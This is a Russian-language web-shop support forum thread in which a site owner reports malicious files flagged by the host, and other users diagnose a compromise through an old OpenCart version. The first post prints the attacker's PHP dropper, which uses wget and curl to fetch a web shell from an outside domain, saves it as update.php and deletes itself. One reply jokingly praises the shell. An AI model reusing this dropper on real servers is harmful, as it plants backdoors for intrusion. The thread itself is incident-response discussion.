Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Хостер прислал письмо о вредоносных файлах на сервере


sh0ut

Recommended Posts

Добрый день, получил сегодня письмо счастья от хостера, в нем говорилось что у меня на сервере есть вредоносные файлы их список:

system/logs/update.php

открыть его не получилось поэтому я просто его удалил.

Рядом лежал ещё 1 инородный файл test.php вот его код:

2014-11-17 3:59:06 - PHP Notice:  Error: Table 'p140879_store.inexistent_table' doesn't exist<br />Error No: 1146<br />SELECT '<?php
print_r(shell_exec("wget http://123sandalika.ru/images/colorbox/photo.ico -O update.php"));
shell_exec("wget http://123sandalika.ru/images/colorbox/photo.ico -O update.php");

$id="http://123sandalika.ru/images/colorbox/photo.ico";
$savefile="update.php";

$ch = curl_init ($id);
$fp = fopen ($savefile, "w");
curl_setopt ($ch, CURLOPT_FILE, $fp);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
echo "end";

shell_exec("rm -f test.php");
system("rm test.php");

unlink(test.php);
?>' 
FROM `inexistent_table` in /home/p140879/www/.../system/database/mysql.php on line 49

Что это и о чём это говорит?

сейчас проверяю компьютер на вирусы, позже отпишусь!

Надіслати
Поділитися на інших сайтах


Это говорит о том, что Вас хакнули. еще у Вас в файле http://123sandalika.ru/images/colorbox/photo.ico находится шелл:

  Показати вміст

 

В интернете полно инструкций о том, как Вы можете себя обезопасить, найти и закрыть дыру. 

Надіслати
Поділитися на інших сайтах

верно - вас заразили.

курите логи сервера на предмет "КОГДА?" (и, возможно, "как?").

латайте дыры, вычищайте весь мусор.

Надіслати
Поділитися на інших сайтах

Шелл, кстати, очень хороший. Рекомендую. Отписался владельцам 123sandalika.ru на всякий случай. 

Змінено користувачем halfhope
Надіслати
Поділитися на інших сайтах

  Цитата

еще у Вас в файле http://123sandalika....orbox/photo.ico находится шелл:

это не у меня, не имею никакого отношения к этому сайту!

  Цитата

В интернете полно инструкций о том, как Вы можете себя обезопасить, найти и закрыть дыру.

Дайте пожалуйста несколько ссылок, почитать.

Я с безопасностью плохо знаком, с удовольствием отдал бы этот вопрос на аутсорс!

 

Ещё кстати интересный момент, у меня на сервере были 2 папки, 2 сайта, прототип на версии 1.5.3.1 и рабочий 1.5.5.1.2, заразили именно прототип

Надіслати
Поділитися на інших сайтах


Это нормально, так как в 1.5.3 была дыра.

Но зловред этот очень веселый, сталкивался с ним. По хорошему надо бы весь магазин пересобрать.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.